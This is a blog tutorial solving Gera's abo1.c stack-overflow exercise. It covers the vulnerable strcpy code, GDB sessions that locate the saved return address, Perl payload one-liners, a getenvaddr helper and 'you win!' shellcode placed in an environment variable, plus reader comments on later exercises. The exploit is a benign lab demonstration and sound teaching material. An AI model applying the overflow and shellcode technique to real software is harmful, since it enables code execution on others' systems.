Insecure Programming by Example: Advanced Buffer Overflows 1

Introexecuduction

Ok, after a nice break, I’m ready to…break :-). I have a couple of Python related posts in my docket, but today we’re going to start work on the next exploit exercises by Gera in his Insecure Programming by Example series, Advanced Buffer Overflows! I hope they aren’t too advanced. This should be refreshing to write about, because I havent done any of these yet. On to the code!

Gera says:
Advanced Buffer Overflow #1

blind obedience

What would happen if you store 512 characters where there is only space for 256? You may claim that you can’t, and you’ll be right, but still, there are situations that, unconsciously, you tell the micro to do so, and he can only but obey you… and he’ll do his best without thinking of side effects. Now is when we get technical, fasten your seat belts, this turbulence will last forever.

What defines a buffer overflow is the copy of a memory region into another region not big enough to contain it.

/* abo1.c                                       *
 * specially crafted to feed your brain by gera */

/* Dumb example to let you get introduced...    */

int main(int argv,char **argc) {
        char buf[256];

        strcpy(buf,argc[1]);
}

Gera continues:
This is a good and simple abo: on execution this program will copy the contents of argc[1] *1, whatever it is, into the reserved 256 bytes named buf, strcpy() will not do any checks of any kind, it will just copy bytes from source to destination, from argc[1] to buf, until it finds a zero. Here, a chance is given for us to supply a longer-than-expected argc[1] to write in memory past the end of the reserved space named buf. Why is this a security problem? becouse we can change data that we shouldn’t be able to, and usually, this data we can change has a very special meaning for the micro, and by exploiting this meaning, we can confuse the micro and make it do what we want. That’s the secret, go get a debugger, a compiler, and all the tools you think you’ll need, and find out what’s the data after buf and why it’s so important to be able to modify it.

1 – argc and argv are just names for main’s arguments, they just name chunks of bits in memory, their names are not meaningful by their own but for their context.

On a side note, I’m not sure why this compiles correctly without doing #include <stdio.h> but it does work with even a really old version of gcc. Either way, the notes that Gera provides are well worth reading and understanding. This is actually a fairly easy piece of code to exploit, given what we’ve worked with previously in the stackN.c series. We’ll actually re-use our shellcode from that series to print out “you win!” upon successfully exploiting this program. If you haven’t already done so, go read the stack5.c post I did earlier where I delve into the generation of the shellcode we’re going to use here.

Exploitimitation

The only change of note for this vulnerable piece of software is the use of the strcpy() function. You may remember we discussed earlier why this function, along with gets() and a bunch of others, is not a good idea to use. It is the use of the strcpy() function that allows us to overflow the buffer, as it does not do bounds-checking on input to the buffer. This function just copies whatever you give it to the buffer, the copy continues unchecked, and can be used in a similar way as our gets() function was used to overwrite other areas on the stack (or beyond) to gain control over EIP and hence program execution.

What we’re going to do is this:

  1. Determine the location in memory of the variable buf.
  2. Determine the location in memory of the saved EIP within the stack frame for the call to the main() function, using our debugger GDB.
  3. Determine the offset (number of bytes) we need to overflow the saved EIP by subtracting the address of the saved EIP from the beginning address of the buf array. It’s worth noting here that the stack grows from higher addresses to lower addresses (whereas the heap grows in reverse direction), but it takes data from low-to-high just like anything else, which is something that will take you a while to get into your head permanently. A good (but old) document describing this is at tldp.org, and a thorough overview can be found at linux-mm.org.
  4. Through the first command line argument (a.k.a. argc[1]), send data which will hopefully cause the program to print out “you win!” upon exiting the strcpy() function.

Let’s get started by compiling the code and examining it in GDB to determine the locations in memory we are concerned with. I will be compiling the binary with the -static option, which will compile all of the external libc calls inline, it makes things a bit easier to see sometimes in GDB, but do whatever works for you.

hacking@hacking:~/InsecureProgramming $ gcc -ggdb -static -o abo1 abo1.c
hacking@hacking:~/InsecureProgramming $ gdb -q abo1
Using host libthread_db library &quot;/lib/tls/i686/cmov/libthread_db.so.1&quot;.
(gdb) set disassembly-flavor intel
(gdb) list
1       /* abo1.c                                       *
2        * specially crafted to feed your brain by gera */
3
4       /* Dumb example to let you get introduced...    */
5
6       int main(int argv,char **argc) {
7               char buf[256];
8
9               strcpy(buf,argc[1]);
10      }
(gdb) break 10
Breakpoint 1 at 0x8048251: file abo1.c, line 10.
(gdb) run AAAAAAAA
Starting program: /home/hacking/InsecureProgramming/abo1 AAAAAAAA

Breakpoint 1, main (argv=2, argc=0xbffff864) at abo1.c:10
10      }
(gdb) backtrace
#0  main (argv=2, argc=0xbffff864) at abo1.c:10
(gdb) info frame 0
Stack frame at 0xbffff620:
 eip = 0x8048251 in main (abo1.c:10); saved eip 0x8048455
 source language c.
 Arglist at 0xbffff618, args: argv=2, argc=0xbffff864
 Locals at 0xbffff618, Previous frame's sp is 0xbffff620
 Saved registers:
  ebp at 0xbffff618, eip at 0xbffff61c
(gdb) x/8x buf
0xbffff510:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff520:     0x41414141      0x41414141      0x41414141      0x41414141

We can see in the highlighted lines the address of the various points we are interested in, also we can see that after we have already exited the strcpy() function, that the buffer is indeed containing a bunch of “A” characters (0x41). Now that we know where everything is, we can do a bit of arithmetic and determine what our offset is, and then we can get along to deploying our simple shellcode to take control of the EIP register and make it do what we want.

hacking@hacking:~/InsecureProgramming $ gdb -q abo1
Using host libthread_db library &quot;/lib/tls/i686/cmov/libthread_db.so.1&quot;.
(gdb) break 10
Breakpoint 1 at 0x8048251: file abo1.c, line 10.
(gdb) run AAAAAAAA
Starting program: /home/hacking/InsecureProgramming/abo1 AAAAAAAA

Breakpoint 1, main (argv=2, argc=0xbffff864) at abo1.c:10
10      }
(gdb) info frame 0
Stack frame at 0xbffff620:
 eip = 0x8048251 in main (abo1.c:10); saved eip 0x8048455
 source language c.
 Arglist at 0xbffff618, args: argv=2, argc=0xbffff864
 Locals at 0xbffff618, Previous frame's sp is 0xbffff620
 Saved registers:
  ebp at 0xbffff618, eip at 0xbffff61c
(gdb) x/x buf
0xbffff510:     0x41414141
(gdb) print 0xbffff61c - 0xbffff510
$1 = 268
(gdb) quit
The program is running.  Exit anyway? (y or n) y
hacking@hacking:~/InsecureProgramming $ perl -e 'print &quot;A&quot; x 268 . &quot;BBBB\n&quot;;'
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB
hacking@hacking:~/InsecureProgramming $ gdb -q abo1
Using host libthread_db library &quot;/lib/tls/i686/cmov/libthread_db.so.1&quot;.
(gdb) break 10
Breakpoint 1 at 0x8048251: file abo1.c, line 10.
(gdb) run AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB
Starting program: /home/hacking/InsecureProgramming/abo1 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB

Breakpoint 1, main (argv=0, argc=0xbffff764) at abo1.c:10
10      }
(gdb) next
0x42424242 in ?? ()

Now that we have proven control over EIP by overflowing it with “B” characters (0x42), we can deliver the shellcode as described in previous tutorials.

Whiskey Tango Foxtrot?

There is one problem left to solve, it appears that the variable addresses for the regular runtime of the program differ from the variable addresses while in GDB. Since this code doesn’t print out the variable addresses at runtime like the stackN.c examples, and since we don’t want to modify the source to do so in the spirit of the exercise, we have to find another reliable way to exploit the program. There are some tricks we can employ here by placing our shellcode into an environment variable, and then using the getenv() C library call to determine the location of that environment variable in the program’s memory. All programs executed from Bash (or any shell, really) seem to load the environment variables defined in the shell (viewable with the env command) directly into the memory of any process run as a child of that shell. Once we have the location of the shellcode in the environment variable, we can overwrite the value of EIP with that location and successfully exploit the program. This technique is described in greater detail in Hacking: The Art of Exploitation, 2nd Edition by Jon Erickson (if you can’t tell, this is a pretty good book). Indeed, the getenvaddr.c we’re going to use below is provided for free from the book’s website. But if you’re following along with me here, you should really read this book in it’s entirety.

#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;string.h&gt;

int main(int argc, char *argv[]) {
	char *ptr;

	if(argc &lt; 3) {
		printf(&quot;Usage: %s &lt;environment variable&gt; &lt;target program name&gt;\n&quot;, argv[0]);
		exit(0);
	}
	ptr = getenv(argv[1]); /* get env var location */
	ptr += (strlen(argv[0]) - strlen(argv[2]))*2; /* adjust for program name */
	printf(&quot;%s will be at %p\n&quot;, argv[1], ptr);
}

We can then load our shellcode into an environment variable and overflow the buffer repeatedly with the determined address of the shellcode, which provides us with much win. I hope this was a pretty informative post, and I really hope you all who are following along (all two of you) consider purchasing these books I’m outlining, they are pretty invaluable as a central collection of knowledge. On to the next challenge!

hacking@hacking:~/InsecureProgramming $ cat abo1_shellcode.s
BITS 32             ;  Tell nasm this is 32-bit code.

jmp short one       ;  Jump down to a call at the end.

two:
; ssize_t write(int fd,  const void *buf, size_t count);
pop ecx           ; Pop  the return address (string ptr) into ecx.
xor eax, eax      ; Zero  out full 32 bits of eax register.
mov al, 4         ; Write  syscall #4 to the low byte of eax.
xor ebx, ebx      ; Zero out ebx.
inc ebx           ; Increment ebx to 1,  STDOUT file descriptor.
xor edx, edx
mov dl, 8        ; Length of the string
int 0x80          ; Do syscall: write(1, string, 14)

; void _exit(int status);
mov al, 1        ; Exit syscall #1, the top 3 bytes are still zeroed.
dec ebx          ; Decrement ebx back down to 0 for status = 0.
int 0x80         ; Do syscall: exit(0)

one:
call two   ; Call back upwards to avoid null bytes
db &quot;you win!&quot; ; with newline and carriage return bytes.
hacking@hacking:~/InsecureProgramming $ nasm -o abo1_shellcode abo1_shellcode.s
hacking@hacking:~/InsecureProgramming $ hexdump -C abo1_shellcode
00000000  eb 13 59 31 c0 b0 04 31  db 43 31 d2 b2 08 cd 80  |..Y1...1.C1.....|
00000010  b0 01 4b cd 80 e8 e8 ff  ff ff 79 6f 75 20 77 69  |..K.......you wi|
00000020  6e 21                                             |n!|
00000022
hacking@hacking:~/InsecureProgramming $ export SHELLCODE=$(cat abo1_shellcode)
hacking@hacking:~/InsecureProgramming $ env | grep SHELLCODE
SHELLCODE=? Y1?? 1?C1?? K??????you win!
hacking@hacking:~/InsecureProgramming $ ~/booksrc/getenvaddr SHELLCODE ./abo1
SHELLCODE will be at 0xbffff9e1
hacking@hacking:~/InsecureProgramming $ ./abo1 $(perl -e 'print &quot;\xe1\xf9\xff\xbf&quot; x 75;')
you win!hacking@hacking:~/InsecureProgramming $
Advertisements

6 responses

  1. Great posts re: insecure programming. I noticed you mentioned abo2 on twitter and are having trouble. I am still learning this stuff, but I think exploiting the writable .dtors section is where to go with this.

  2. I stand corrected — the GOT is probably the correct way to do this. Like I said, still learning. 🙂

    1. Haldo,

      Sorry I hadn’t responded, didn’t see these until getting in to work today, thanks for reading :-). It’s interesting, I cam across the PAT/GOT in the book I keep plugging (Hacking; the art etc.) at the end of the exploitation section. I haven’t had any time to play lately (soon, hopefully) but it seems that a stack overflow wouldn’t be well suited to write to the PAT or the GOT due to their positions in memory. Not sure, but it seems those techniques are typically tied to format string bugs and their inherent (apparent, since I’m still learning too) ability to write to arbitrary memory addresses.

      I should have a post on this in a few days (_if_ I am successful). Thanks again for reading, what’s your Twitter u/n?

      –Mike

  3. […] Since the program in question isn’t pushing and popping at all, and doesn’t appear to be modifying esp or ebp that much, we can just run the program once real quick from the beginning to populate the registers and determine the offset between our unbounded strcpy destination buf and ebp-12. Once we have the offset, we’ll re-run the program with a quick inline Perl script to print the offset-worth of junk bytes and the string “BBBB” to overwrite ebp-12. I’ve placed a breakpoint directly before the call eax instruction, and at that point we examine eax to confirm that we control execution. Now here is a quickie with shellcode that we’ll reuse from abo1.c. […]

  4. […] variable and determining it’s address with a special program, a technique I detailed in the abo1.c post I did some time ago. Happy […]

  5. […] Insecure Programming by Example: Advanced Buffer Overflows 1 December 2009 5 comments and 1 Like on WordPress.com, 4 […]

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: